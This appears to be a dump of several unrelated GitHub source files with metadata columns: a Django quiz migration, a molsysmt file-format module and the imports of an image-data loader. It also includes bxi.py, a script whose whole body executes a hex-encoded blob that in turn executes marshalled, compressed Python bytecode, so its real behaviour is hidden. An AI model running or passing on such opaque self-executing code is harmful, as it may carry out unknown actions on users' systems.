kid7960/Uni-board
|
6a9525bef972a31576fc5dc190d9fe106e701c3e
|
[
"MIT"
] | null | null | null |
src/main/apps/quiz/migrations/0002_auto_20210309_1526.py
|
kid7960/Uni-board
|
6a9525bef972a31576fc5dc190d9fe106e701c3e
|
[
"MIT"
] | null | null | null |
# Generated by Django 3.1.7 on 2021-03-09 15:26
from django.db import migrations, models
class Migration(migrations.Migration):
    """Add ten question slots to quiz_model.

    For each question N (listed as 10, then 1..9, matching the original
    auto-generated ordering): a nullable answer field, four option text
    fields, and the question text field.
    """

    dependencies = [
        ('quiz', '0001_initial'),
    ]

    # Two option fields in the original auto-generated migration carried a
    # default of 2 instead of 0; preserved here explicitly.
    _DEFAULT_OVERRIDES = {'quiz_q1_opt2': 2, 'quiz_q2_opt3': 2}

    operations = []
    for _q in ['10', '1', '2', '3', '4', '5', '6', '7', '8', '9']:
        operations.append(migrations.AddField(
            model_name='quiz_model',
            name='quiz_q%s_answer' % _q,
            field=models.PositiveSmallIntegerField(null=True),
        ))
        for _opt in ['opt1', 'opt2', 'opt3', 'opt4']:
            _field_name = 'quiz_q%s_%s' % (_q, _opt)
            operations.append(migrations.AddField(
                model_name='quiz_model',
                name=_field_name,
                field=models.TextField(
                    default=_DEFAULT_OVERRIDES.get(_field_name, 0),
                    max_length=2048,
                ),
                preserve_default=False,
            ))
        operations.append(migrations.AddField(
            model_name='quiz_model',
            name='quiz_q%s_qstn' % _q,
            field=models.CharField(default=0, max_length=1024),
            preserve_default=False,
        ))
    # Drop the loop helpers so they do not linger as class attributes.
    del _q, _opt, _field_name
| 34.271978
| 63
| 0.560721
| 1,227
| 12,475
| 5.422983
| 0.04727
| 0.162308
| 0.234445
| 0.243463
| 0.979261
| 0.978058
| 0.978058
| 0.978058
| 0.978058
| 0.967839
| 0
| 0.045175
| 0.334589
| 12,475
| 363
| 64
| 34.366391
| 0.756415
| 0.003607
| 0
| 0.812325
| 1
| 0
| 0.109591
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.002801
| 0
| 0.011204
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
f64a4353e5c88b155e1aa32015b3d7c34b74c8f8
| 10,979
|
py
|
Python
|
molsysmt/forms/api_file_msmpk.py
|
dprada/molsysmt
|
83f150bfe3cfa7603566a0ed4aed79d9b0c97f5d
|
[
"MIT"
] | null | null | null |
molsysmt/forms/api_file_msmpk.py
|
dprada/molsysmt
|
83f150bfe3cfa7603566a0ed4aed79d9b0c97f5d
|
[
"MIT"
] | null | null | null |
molsysmt/forms/api_file_msmpk.py
|
dprada/molsysmt
|
83f150bfe3cfa7603566a0ed4aed79d9b0c97f5d
|
[
"MIT"
] | null | null | null |
import numpy as np
from molsysmt.forms.common_gets import *
from molsysmt._private_tools.exceptions import *
from molsysmt import puw
import sys
import importlib
from molsysmt.native.molecular_system import molecular_system_components
from molsysmt._private_tools.files_and_directories import temp_filename
form_name = 'file:msmpk'

# Registry mapping: the recognized form string resolves to this module's form.
is_form = {
    'file:msmpk': form_name,
}

info = ["", ""]

# Start from the shared component template and enable the components a
# msmpk file actually provides.
has = molecular_system_components.copy()
for _component in ('elements', 'bonds', 'coordinates', 'box'):
    has[_component] = True
def to_molsysmt_MolSys(item, molecular_system=None, atom_indices='all', frame_indices='all'):
    """Convert a msmpk file item into a molsysmt MolSys object."""

    from molsysmt.native.io.molsys import from_file_msmpk

    new_item, new_molecular_system = from_file_msmpk(
        item, molecular_system=molecular_system,
        atom_indices=atom_indices, frame_indices=frame_indices)

    return new_item, new_molecular_system
def to_molsysmt_Topology(item, molecular_system=None, atom_indices='all', frame_indices='all'):
    """Convert a msmpk file item into a molsysmt Topology object."""

    from molsysmt.native.io.topology import from_file_msmpk

    new_item, new_molecular_system = from_file_msmpk(
        item, molecular_system=molecular_system,
        atom_indices=atom_indices, frame_indices=frame_indices)

    return new_item, new_molecular_system
def to_molsysmt_Trajectory(item, molecular_system=None, atom_indices='all', frame_indices='all'):
    """Convert a msmpk file item into a molsysmt Trajectory object."""

    from molsysmt.native.io.trajectory.topology import from_file_msmpk

    new_item, new_molecular_system = from_file_msmpk(
        item, molecular_system=molecular_system,
        atom_indices=atom_indices, frame_indices=frame_indices)

    return new_item, new_molecular_system
def to_nglview_NGLWidget(item, molecular_system=None, atom_indices='all', frame_indices='all'):
    """Render a msmpk file item as an NGLView widget.

    The file is first converted to a MolSys, which is then handed to the
    MolSys-form converter to build the widget.
    """

    from molsysmt.forms.api_molsysmt_MolSys import to_nglview_NGLWidget as _molsys_to_widget

    widget_item, widget_molecular_system = to_molsysmt_MolSys(
        item, molecular_system=molecular_system,
        atom_indices=atom_indices, frame_indices=frame_indices)
    widget_item, widget_molecular_system = _molsys_to_widget(
        widget_item, molecular_system=widget_molecular_system)

    return widget_item, widget_molecular_system
def to_file_msmpk(item, molecular_system=None, atom_indices='all', frame_indices='all', output_filename=None, copy_if_all=False):
    """Return a msmpk file item (and updated molecular system) for a selection.

    When the whole system is selected ('all' atoms and 'all' frames), the
    original item is returned untouched unless copy_if_all is True, in which
    case a copy is extracted to output_filename. Otherwise the selection is
    extracted into a new file.
    """

    tmp_molecular_system = None

    # Fix: compare with '==', not 'is' — identity comparison against a string
    # literal relies on CPython interning and raises a SyntaxWarning.
    if (atom_indices == 'all') and (frame_indices == 'all'):
        if copy_if_all:
            tmp_item = extract(item, output_filename=output_filename)
            if molecular_system is not None:
                tmp_molecular_system = molecular_system.combine_with_items(tmp_item)
        else:
            tmp_item = item
            if molecular_system is not None:
                tmp_molecular_system = molecular_system
    else:
        tmp_item = extract(item, atom_indices=atom_indices, frame_indices=frame_indices,
                           output_filename=output_filename)
        if molecular_system is not None:
            tmp_molecular_system = molecular_system.combine_with_items(
                tmp_item, atom_indices=atom_indices, frame_indices=frame_indices)

    return tmp_item, tmp_molecular_system
def extract(item, atom_indices='all', frame_indices='all', output_filename=None):
    """Extract a selection from a msmpk file item into a new file.

    Not implemented yet: always raises NotImplementedError.
    """

    if output_filename is None:
        # NOTE(review): 'mmtf' looks copied from another form module; a msmpk
        # extension would be expected here — confirm before relying on it.
        output_filename = temp_filename(extension='mmtf')

    # Fix: compare with '==', not 'is' — identity comparison against a string
    # literal relies on CPython interning and raises a SyntaxWarning. Also
    # removed the unreachable 'return tmp_item' (tmp_item was never assigned).
    if (atom_indices == 'all') and (frame_indices == 'all'):
        raise NotImplementedError()
    else:
        raise NotImplementedError()
def merge(item_1, item_2):
    """Merging two msmpk items is not supported yet."""
    raise NotImplementedError
def add(to_item, item):
    """Adding one msmpk item into another is not supported yet."""
    raise NotImplementedError
def append_frames(item, step=None, time=None, coordinates=None, box=None):
    """Appending frames to a msmpk item is not supported yet."""
    raise NotImplementedError
def concatenate_frames(item, step=None, time=None, coordinates=None, box=None):
    """Concatenating frames from msmpk items is not supported yet."""
    raise NotImplementedError
##### Get
def aux_get(item, indices='all', frame_indices='all'):
    """Generic getter: convert the item to a MolSys and delegate the query.

    The attribute to fetch is recovered from the CALLER's function name via
    frame introspection (sys._getframe(1).f_code.co_name), so this function
    must only be called directly from one of the get_*_from_* wrappers below,
    whose names must match the getters in api_molsysmt_MolSys.
    """

    # Fix: removed the unused 'from molsysmt.forms import forms' import.

    # Name of the calling wrapper function, one frame up the stack.
    method_name = sys._getframe(1).f_code.co_name

    tmp_item, _ = to_molsysmt_MolSys(item)
    module = importlib.import_module('molsysmt.forms.api_molsysmt_MolSys')
    _get = getattr(module, method_name)
    output = _get(tmp_item, indices=indices, frame_indices=frame_indices)

    return output
## Atom
# Atom-level getters. Each wrapper delegates to aux_get(), which reads the
# *caller's* function name via sys._getframe(1) to select the matching getter
# in api_molsysmt_MolSys — so these exact names must be preserved and aux_get
# must be called directly (no extra indirection).
def get_atom_id_from_atom(item, indices='all', frame_indices='all'):
    return aux_get(item, indices=indices, frame_indices=frame_indices)
def get_atom_name_from_atom(item, indices='all', frame_indices='all'):
    return aux_get(item, indices=indices, frame_indices=frame_indices)
def get_atom_type_from_atom(item, indices='all', frame_indices='all'):
    return aux_get(item, indices=indices, frame_indices=frame_indices)
def get_group_index_from_atom (item, indices='all', frame_indices='all'):
    return aux_get(item, indices=indices, frame_indices=frame_indices)
def get_component_index_from_atom (item, indices='all', frame_indices='all'):
    return aux_get(item, indices=indices, frame_indices=frame_indices)
def get_chain_index_from_atom (item, indices='all', frame_indices='all'):
    return aux_get(item, indices=indices, frame_indices=frame_indices)
def get_molecule_index_from_atom (item, indices='all', frame_indices='all'):
    return aux_get(item, indices=indices, frame_indices=frame_indices)
def get_entity_index_from_atom (item, indices='all', frame_indices='all'):
    return aux_get(item, indices=indices, frame_indices=frame_indices)
def get_inner_bonded_atoms_from_atom (item, indices='all', frame_indices='all'):
    return aux_get(item, indices=indices, frame_indices=frame_indices)
def get_n_inner_bonds_from_atom (item, indices='all', frame_indices='all'):
    return aux_get(item, indices=indices, frame_indices=frame_indices)
def get_coordinates_from_atom(item, indices='all', frame_indices='all'):
    return aux_get(item, indices=indices, frame_indices=frame_indices)
def get_frame_from_atom(item, indices='all', frame_indices='all'):
    return aux_get(item, indices=indices, frame_indices=frame_indices)
## group
# Group-level getters; dispatched by function name through aux_get()
# (sys._getframe introspection) — keep these names unchanged.
def get_group_id_from_group(item, indices='all', frame_indices='all'):
    return aux_get(item, indices=indices, frame_indices=frame_indices)
def get_group_name_from_group(item, indices='all', frame_indices='all'):
    return aux_get(item, indices=indices, frame_indices=frame_indices)
def get_group_type_from_group(item, indices='all', frame_indices='all'):
    return aux_get(item, indices=indices, frame_indices=frame_indices)
## component
# Component-level getters; dispatched by function name through aux_get()
# (sys._getframe introspection) — keep these names unchanged.
def get_component_id_from_component (item, indices='all', frame_indices='all'):
    return aux_get(item, indices=indices, frame_indices=frame_indices)
def get_component_name_from_component (item, indices='all', frame_indices='all'):
    return aux_get(item, indices=indices, frame_indices=frame_indices)
def get_component_type_from_component (item, indices='all', frame_indices='all'):
    return aux_get(item, indices=indices, frame_indices=frame_indices)
## molecule
# Molecule-level getters; dispatched by function name through aux_get()
# (sys._getframe introspection) — keep these names unchanged.
def get_molecule_id_from_molecule (item, indices='all', frame_indices='all'):
    return aux_get(item, indices=indices, frame_indices=frame_indices)
def get_molecule_name_from_molecule (item, indices='all', frame_indices='all'):
    return aux_get(item, indices=indices, frame_indices=frame_indices)
def get_molecule_type_from_molecule (item, indices='all', frame_indices='all'):
    return aux_get(item, indices=indices, frame_indices=frame_indices)
## chain
# Chain-level getters; dispatched by function name through aux_get()
# (sys._getframe introspection) — keep these names unchanged.
def get_chain_id_from_chain (item, indices='all', frame_indices='all'):
    return aux_get(item, indices=indices, frame_indices=frame_indices)
def get_chain_name_from_chain (item, indices='all', frame_indices='all'):
    return aux_get(item, indices=indices, frame_indices=frame_indices)
def get_chain_type_from_chain (item, indices='all', frame_indices='all'):
    return aux_get(item, indices=indices, frame_indices=frame_indices)
## entity
# Entity-level getters; dispatched by function name through aux_get()
# (sys._getframe introspection) — keep these names unchanged.
def get_entity_id_from_entity (item, indices='all', frame_indices='all'):
    return aux_get(item, indices=indices, frame_indices=frame_indices)
def get_entity_name_from_entity (item, indices='all', frame_indices='all'):
    return aux_get(item, indices=indices, frame_indices=frame_indices)
def get_entity_type_from_entity (item, indices='all', frame_indices='all'):
    return aux_get(item, indices=indices, frame_indices=frame_indices)
# System
# System-level getters (counts, box, time/step, bonds); dispatched by
# function name through aux_get() (sys._getframe introspection) — keep
# these names unchanged.
def get_n_atoms_from_system(item, indices='all', frame_indices='all'):
    return aux_get(item, indices=indices, frame_indices=frame_indices)
def get_n_groups_from_system(item, indices='all', frame_indices='all'):
    return aux_get(item, indices=indices, frame_indices=frame_indices)
def get_n_components_from_system(item, indices='all', frame_indices='all'):
    return aux_get(item, indices=indices, frame_indices=frame_indices)
def get_n_chains_from_system(item, indices='all', frame_indices='all'):
    return aux_get(item, indices=indices, frame_indices=frame_indices)
def get_n_molecules_from_system(item, indices='all', frame_indices='all'):
    return aux_get(item, indices=indices, frame_indices=frame_indices)
def get_n_entities_from_system(item, indices='all', frame_indices='all'):
    return aux_get(item, indices=indices, frame_indices=frame_indices)
def get_n_bonds_from_system(item, indices='all', frame_indices='all'):
    return aux_get(item, indices=indices, frame_indices=frame_indices)
def get_box_from_system(item, indices='all', frame_indices='all'):
    return aux_get(item, indices=indices, frame_indices=frame_indices)
def get_box_shape_from_system(item, indices='all', frame_indices='all'):
    return aux_get(item, indices=indices, frame_indices=frame_indices)
def get_box_lengths_from_system(item, indices='all', frame_indices='all'):
    return aux_get(item, indices=indices, frame_indices=frame_indices)
def get_box_angles_from_system(item, indices='all', frame_indices='all'):
    return aux_get(item, indices=indices, frame_indices=frame_indices)
def get_box_volume_from_system(item, indices='all', frame_indices='all'):
    return aux_get(item, indices=indices, frame_indices=frame_indices)
def get_time_from_system(item, indices='all', frame_indices='all'):
    return aux_get(item, indices=indices, frame_indices=frame_indices)
def get_step_from_system(item, indices='all', frame_indices='all'):
    return aux_get(item, indices=indices, frame_indices=frame_indices)
def get_n_frames_from_system(item, indices='all', frame_indices='all'):
    return aux_get(item, indices=indices, frame_indices=frame_indices)
def get_bonded_atoms_from_system(item, indices='all', frame_indices='all'):
    return aux_get(item, indices=indices, frame_indices=frame_indices)
###### Set
def set_box_to_system(item, indices='all', frame_indices='all', value=None):
    """Setting the box on a msmpk file item is not supported yet."""
    raise NotImplementedError
def set_coordinates_to_system(item, indices='all', frame_indices='all', value=None):
    """Setting coordinates on a msmpk file item is not supported yet."""
    raise NotImplementedError
| 34.416928
| 136
| 0.776665
| 1,564
| 10,979
| 5.089514
| 0.070332
| 0.232161
| 0.238693
| 0.143719
| 0.834673
| 0.820352
| 0.812563
| 0.797487
| 0.78706
| 0.752261
| 0
| 0.000311
| 0.122051
| 10,979
| 318
| 137
| 34.525157
| 0.825501
| 0.005192
| 0
| 0.401198
| 0
| 0
| 0.037537
| 0.00312
| 0
| 0
| 0
| 0
| 0
| 1
| 0.335329
| false
| 0
| 0.083832
| 0.257485
| 0.718563
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 11
|
f66d895d318123e038fb426fa906dde99164f125
| 13,018
|
py
|
Python
|
bxi.py
|
Ahsan2020xpos/bxi
|
88d20c3778aa71ada64fac687afc007b6baab095
|
[
"Apache-2.0"
] | null | null | null |
bxi.py
|
Ahsan2020xpos/bxi
|
88d20c3778aa71ada64fac687afc007b6baab095
|
[
"Apache-2.0"
] | null | null | null |
bxi.py
|
Ahsan2020xpos/bxi
|
88d20c3778aa71ada64fac687afc007b6baab095
|
[
"Apache-2.0"
] | null | null | null |
# Auther : Ahsan
# GitHub : https://github.com/Binyamin-binni
# YouTube Channel : Tricker Ahsan
import base64
exec(base64.b16decode('2320436F6D70696C6564204279203A2042696E79616D696E0A2320476974487562203A2068747470733A2F2F6769746875622E636F6D2F42696E79616D696E2D62696E6E690A2320596F7554756265204368616E6E656C203A20547269636B2050726F6F660A696D706F7274206D61727368616C0A65786563286D61727368616C2E6C6F6164732827635C7830305C7830305C7830305C7830305C7830305C7830305C7830305C7830305C7830335C7830305C7830305C783030405C7830305C7830305C78303073215C7830305C7830305C783030645C7830305C783030645C7830315C7830306C5C7830305C7830305A5C7830305C783030655C7830305C7830306A5C7830315C783030645C7830325C7830305C7838335C7830315C783030645C7830315C7830305C78303455645C7830315C78303053285C7830335C7830305C7830305C783030695C7866665C7866665C7866665C7866664E735C7866395C7830375C7830305C783030785C7839635C786564586D735C7864625C7862385C7831315C7866652C5C7866645C6E5C7838346D4D5C7861615C786136484A5C786236645C7864395C7831655C786235235C7862665C7863355C7839655C7864385C7839365C7863365C7839365C7839335E5C7831645C7830665C7830625C7839325C7861305C7838345C783133495C786230205C7831395C7864395C7862395C7862395C7866667E5C7830625C786630455C783934645C275C7839375C7862625C7839397E2A3231495C7865635C7865325C7864395C7863355C7862655C7830324A5C7866395C786362515C7831335C7863315C786130615C786363785C783861585C7861325C272F5C7838395C7839655C7864325C7839305C7865385C7831654E5C7838397C5C786531385C786632585C7861385C78636671325C7830665C7861385C786133735C7861325C786137734E5C786230475C7861335C7839395C786665735C786332223D5C7865335C783831205C7862385C7838632D285C7831316F335C7839325C78633638495C7866345C7839305C786238735C7831635C7864315C7861665C783830415C7866655C7839625C783931244D745C7865375C78393946525C7861325C786366595C7838385C7863322C48695C7863635C7839394B5C7839325C7830345C7865305C7838635C7839385C7862315C7861305C786434652A5C7838354C60665C7863355F5C7863325C7831385C7865345C78643925714A595C7839345C7839345C7865635C7861372C5C7838615C7838382B5C7861365C78636539675C786263265C786133545C7861325C7865343C5C7865316C5C7839395C7831305C7864655C786363315C7864305C7839355C78396
35C7839355C783862725B5C7862305C7863345C783030235C786134245C7864345C7864345C7839385C7863365D445C786133245C78633541505C74575B5C786466645C7861625C7865347D5C7838374F585C7865325C7831355C7839365C7863355C7861635C7865325C7838385C783938477E2E5C7863355C74575C7831384940485C786163755C786236575C7862645C786134735C783136755C78393171773E3A5C7862623937425C7830665635395C745C7831385C78663634606A355C7865315C7838665C7839315C7839305C786434233E5C7830365C7839625C7839335C786338655C7863325C7837665C7839615C7839615C7861355C7866655C783030785C7831645C7838655C7838362B5C7863645C7838645C786332445C783961205C78383865365C7863637B5C7830315C7862313973585C783961685C78313738485C7863385C7831365C7838645C7866385C78396324736D5C783835625C7863665C78643334362E5C7861375C7864335C7863395D4E5C7839625C7865345C783965665C7830305C7861635C7838375C7866385C7864395C7831367B5C78316176245C7831305C7866365C786263395C7862385C7839625C7866305C7830345C783134795C7830345C786264407C5C7831625C786366485C7839345C7861615C7862617A5C7838365C7838332F7461765C7838635C78626561215C7865645C783961465C7864395C786633317A38465C7861335C7863385C7865335C7838637A685C7864665C786438375C7862615C7863375C7865385C7866365F5C7862645C7831653A5C786339685C7865305C7839395C7831665C7863365C7864335E5C7863665C7865615C7862375C7864305C7865335C7863355C7863395C7865385C7864365C786263385C7864395C7831665C7831645C7863335C786462475C786233635C7830315C7830365C7866635C7865625C7866365C7838645C7866655C7830305C7861364E3E5C7839615C7866625C786264436B5C7862665C7864335C7862375C7865305C7865625C7865635C7863365C7866635C7863352351425C7864335C7839375C7865315C783965615C7865394B5C7865615C7861355C786633615C7863375C783161585C7866615C7839635C7864305C7864393C5C783164765C7830655C7862625C7864365C7861665C786330797D6A5C7864325C7864345C7862655C7839615C7863325C7865625C7864645C7831615C7863345C7865395C78396439615C7865305C7839355C7831625C7865365C7864305C7838305C7863305C7863345C7863645C7838355C7838395C7839332C5C7831315C7862325C7863655C7863615C7862375C7863395C7861645C7865395C7862325C7864305C7866305C7862314B5C7
831635C7863385C783161635C783831535C783163615C7861315C7863304773745C786666706F5C7866665C7864625C78623246675C7866307D5C7866665C7864315C7865635C7831395C783032763C313B5C7830327D643E5C7830665C786661475C7839385C7838375C7830343B5C7862345C7866645C7865355C7830305C7831663F5C7861395C7861645C78613766225C7831325C78383845605C7862622A455C7865655C786633295C7866306141345C6E5C7830335C783162592C725B5C786662457D5C783130465C78316549235C7831665C7861315C7866665B5C7866395C786462565C7866655C7862355C7864355C786163655C7839635C7831625C7831305C786363455C7839325C786664455C783063743D7E3F465C7866325C7862355C7831395C7862305C7831395C7831625C7861615C7861615C7864615C7831635C7831345C7863335C7863315C7830385C725C783163545C7830636F5C7830305F5C7866305C786266295C7866655C7838385C7861315C6E5C7864614F5C7830335D5C7862635C7865625C7838335C745C786461205C786537535C7866665C7831314C5C78646540452B5C7862322D467B305C783931735C783030205C786639565C7865345C7862365C7831635C783033472F5C7861345C7839365C7831615C7861635C7838314B5C7864385C5C445C7861315C7863315C7831615C7831395C783062422135672D5C7863385C7866395C7831305C7861324B5C7861395C7830325C78613020375C7864623F3C5C7839614D345C7863615C786432395C7865315C783830735C7838344E685C7866345C783832435C7864315C275C7864655C7864335C78663432735C7865345C7861345C786138255C7863395C783931695C786365683A5C7863665C7831635C7830335C7831636B3A5C7830355F5C7831625E225C786461443F5C7862316C5C7839613944704F39755C7831375C7830385C7865615C725C7866335C7839625C7865385C7830345C5C5C7839325C7863342C5C7861645C7861315C7861345C7838325C7831655C7830625C7862325C7865315C783134545C7830315C7866395C78383774475C7864665C783139225C7831365C7839615C7861375C78386373684F225C786533225C7831635C78313248545C786235545F2D5C7838395C7831335C7865385C7839394B5C7863363D497C5C7861365C7862302A602C5C7831365F295C7863665C7838385C7864615C5C5C786365215C7864365C7839315C7839364F5C7839365C7862335C7861645C786263695C7863355C78396346295C7831325C7862315C273F5C7862335C7839355C7831635C7838655C783937365C7838645C7865322C5C78643554345C7831645C7838665C7861665C7
864315C7863335C7866645C7866395C7864645C7865645C7865385C7865365C783163523E6F245C786434475C7864616A5C7863315C7831306D5C7865385A48685C7863342B5C7866355C786236305C275C7861335C7866625C7866624F5C7865335C7862625C7862335C6E5C7862335C7863345D2D5C786161705C7863626D5C7831365C7862385C7865355C786338775C7861305C7861326B365C7839625C7831315C7830665C783961204A32575C7862345C7830623F5C7830625C7838325C7831375C7838345C7831335C7861305C786564565C7831625B5B5C7862615C7864645C7831625C786362515C7831615C7864305C7831375C7831644B5C786164485C7830345C7862655E5C7839375C7866655C7838395C786233685C7838362A4F5C786263535C7864375C7862386A5C7830355C7865305C7864395C7839625C786235594C5C7861325C7865665C7838355C7839345C7864395C7862355C7862615C78393669755C7863645C7838382C5C7864625C7830625C6E5C275C786135685C7864365C7838365C7866395C7831305C786261665C786432667E3B253C5C7863635C7839655C7864623E5C7865335C7863363C5C725C7830335C7862355C7866355C7839365C7863345C7862325C7865346C6F605D5C7866392A5C7863366A5C7863615C7866666F5C7831355C7837664369315C783961705C7830325C7830315C7837662D345C7866307E235C7861355C786630265C7866615C7862646A5C7838383C5C786431555C786333285C7831655C7838367C6C4F3E355C783162205C783066315C7831315C78316572355C786130345C7865345C786636355C786635335C7837665C7864637D5C7831325C7865315C7830335C7838615C7861325C7861625C7830385C7861395C7862625C7861635C7861355C7831665C7863625C7838334F5C7865615C7862312C355C786663205C7838335C786633495C786562783D5C5C5C786134465C7861655C7861335C7862355C7862364E5C783766555C7838645C7839373A5C7839375C7830635C7864625C786331265C7865395C7838315C7839305C7866625C725C7831305C7862395C7862343C6E5C7863625C7830665C78623620296C5E5C786638425C7831335C78626233545C7831645C7861395C78666375335C7862657A5C7863305C7839335C7838315C7839305C783166625C7862355C7830665C786534455C783165615C7866355C7861625C7862317C5C7864365C7839325C7861625C7830365C786333435C7864345C7865363E5C7839325C7863327E5C7839375C7862625C7866325C7863385C786432445D5C7864395C783961545C7831663B5C7838355C7862395C7864315C27285C7863615C7865383C5C7863343
4306F5C7862335C7864305C7838313A5C7830654152655C786431365C7839655C7866615C7864385D5B3A5C7839325C7838395C7838655C786136605C783932685C7839625B795C7864637B425C7865664944385C7831635B5C786436785C7839352D5C7864655C7839655C786635775C7862355D5C7838335C7839306E5C7862315C786464395C7861332E5C786431365C786332705C7839645C7839365C7831625C786363715C7865375C7865625C7866355C786564335C7831635C786161605C7866635C7830335C7864355C7861615C786135645C7838325C7831655C7862665C7839395C7838315C7862305C786166774F5C7865385C78303272455C7863345C7861375C7839625C7839375C7862625C78653065535C7831645C7861645C7863635C7865315C78313554577D5C7864355F5C7862665C7863625C783164705C7862655C7831395C7864365C783062325C7839387D5C7863334C5C7865385C783932705C786232565C783961655C7830365C7861655C783130203B5C7838365C786562715C786238545C7864375C7863395C7863365C7839325338335C7838325C7861635C783864793760495C7864645C7862325C78393525765C7839663E5B7B7B5C7838665C7839645C7865335C7863336E585C7866385C786261565C78643051493C5C7830385C7864375C7864347A5C7861645C7839305C7837665C786162782D5C7839374B5C7865335C7830355C7866345C7838305C7862652F5C7838625C7839365B2B673F5C7839614A355C783766746A5C7866655C7839303E5C7865626C3B4D5C786439536A5C7864395C5C4F5C78656452645C7862385C786630285C7864375C783134305C7861395C745C7866645C7862635C7831365C786163455C7864365C7838655C7865666B5C7864375C7863656D555C7831355C786437435C7837665C7862645C7831635C7864665C7839635C7838625C7864355C7861365C7838315C725C7862345C7862335C7838335C7861323844703D5C786534695C7831646E5C7861625C7839645C786435405C7838615C7839635C7861665C7830316D5C7861395C7862335C786231225C7866635C7862325C7863655C7862645C7861655C7863345C7864625C7865625C786465525C7862375C7862385C7863665C7866655C7866385C7863325C7863647D5C7838615C7862315C7863615C7864635C7838655C78656321755C7831385C7839312D5C7863305C7864655C7839305C786365683452675C7862385D5C5C5C7831625C7866355C7831355C7864625C786231205C7839365C7837665C7861335C786136365E5C7839355C786437585C7863625C7863625C786561535C7861645C7861395C725C7831375C7838345C7861625B5C786
6345C7865396A7A5C7838392E465C7861375C7865375C275C7865335C7866315C7830375C786134565C7862635C7866305C7861345C7864345C786162675C7862316865792935655D3D5C7863615C7862395C7838315C745C7831385C724E5C7865325C7830306E355C7839615C7838325C7831345D5C78633935587A5C7863335C786532675C7831375C786133785C786536205C786435515C786136405C786338335C7862665C7864315C7838302B205C7838364A5C783037576F69235C7861354C285C7861375C783864635C7862615C786261335C7838395C7839635C6E5C74585C78633933315C7839635C7864305C72695C7866395C783766625C7839395C7863375C78623668615C7864315C7862305C78626277705C7864303B3C5C7862345C7830657B5C7838375C7839647E5C7861665C7866375C7862376E5C7861665C7864623B385C7862355C7866635C7863655C7862655C7838355C786231433C5C7864665C7865395C7866375C7862305C7864623D5C7863305C7830377B5C7838375C7863345C7865625C7865306E5C7862375C7862665C78653774765C7861305C7838665C783837385C7831645C7838615F5C783930765C7831326F615C7837665C7838315C786162295C786463525C7838375C7839645C78316422363C5476355C7865615C786235765C7839355C7839645C7838305C7862393820435C7831325C7864395C7830665C7866373B5C78653579525C783930615C7863665C7838325C7830655C7838625C7838375C783934253B5C7862335C786132435C7864385C7863357D5C7864375C7863655C7837665C7839304A5C783030315C7861315C7862335C7865315C7839655C7864665C7865625C7866355C7866635C78633343505C7861375C7865335C7862625C7864655C7830315C7863365C7839365C7862625C7862665C7865665C7866375C7830367E5C7861665C786462257E5F5C7839615C7866315C7861625C7864345C7863375C7839305C7862665C7839625C7830385C783062495C7839625C786662485C7861646F585C7831355C7863355C7866645C7861625C7838385C7830355C7865315C7864385C7861345C7865615C786531225C7863665C7245475C78636152425C7865355C7863345C7861326E7E7D545C7865615C7831305C786361535C7838645C7861335C7861635C7861305C7866395C7863345C7831665C7861615C7839665C7866395C7864325C7866355C7865615C7839395C7863665C7866645C7838395C7864615C7862395C74505C7838625C7866375C725C7863325C786562695C7864345C7863385C786362525C7863655C7246545C7838345C7862637A60295C7864325C7839305C7838665C6E5C7831315C7863396
55C7838375C7863394C792A5C7864395C7865625C7839365C7838304E5C78633632785C7839625C7863335C7831355C78303023774E404526485C7865662A255C7864665C7864615C7862645C783138555C7866395C7863655C7861375C7865614A5C7864355C78613544795C7862325C7838395C7866625C7830355C7861325C7839655C7838395C7861615C7838625C7830624D5C786430525C7839655C7861625C783766585C5C5C7861335C745C7862625C7862366D715C7831365C7862376D682A5C7862365C725C7838315C7831645C786439765C7864315B5C7838615C7862335C7863306F5C7863615C786561235C783862285C7830325C7830305C7830305C783030745C7830345C7830305C7830305C7830307A6C6962745C6E5C7830305C7830305C7830306465636F6D7072657373285C7830305C7830305C7830305C783030285C7830305C7830305C7830305C783030285C7830305C7830305C7830305C783030735C7830345C7830305C7830305C7830305C7831625B306D745C7830385C7830305C7830305C7830303C6D6F64756C653E5C7830345C7830305C7830305C783030735C7830325C7830305C7830305C7830305C7830635C783031272929'))
| 2,603.6
| 12,908
| 0.997311
| 18
| 13,018
| 721.277778
| 0.833333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.857022
| 0.001229
| 13,018
| 5
| 12,908
| 2,603.6
| 0.141517
| 0.006837
| 0
| 0
| 0
| 0
| 0.996596
| 0.996596
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 12
|
f674aa16f5b49755ef43f5b43dd8ed744676eee2
| 33,473
|
py
|
Python
|
data_loading.py
|
se7endragon/cnn_model
|
21d76edfa73bd679182430341979f8d17f7b2940
|
[
"MIT"
] | null | null | null |
data_loading.py
|
se7endragon/cnn_model
|
21d76edfa73bd679182430341979f8d17f7b2940
|
[
"MIT"
] | null | null | null |
data_loading.py
|
se7endragon/cnn_model
|
21d76edfa73bd679182430341979f8d17f7b2940
|
[
"MIT"
] | null | null | null |
import tensorflow as tf
import numpy as np
import pandas as pd
import os
import matplotlib.pyplot as plt
from matplotlib.image import imread, cm
from mpl_toolkits.mplot3d import Axes3D
from IPython.display import Image, display
from copy import deepcopy
from sklearn import datasets
import inception # module from Hvass Labs
import cache # module from Hvass Labs
import dataset # module from Hvass Labs
import download # module from Hvass Labs
import cifar10 # module from Hvass Labs
import knifey # module from Hvass Labs
from inception import NameLookup # module from Hvass Labs
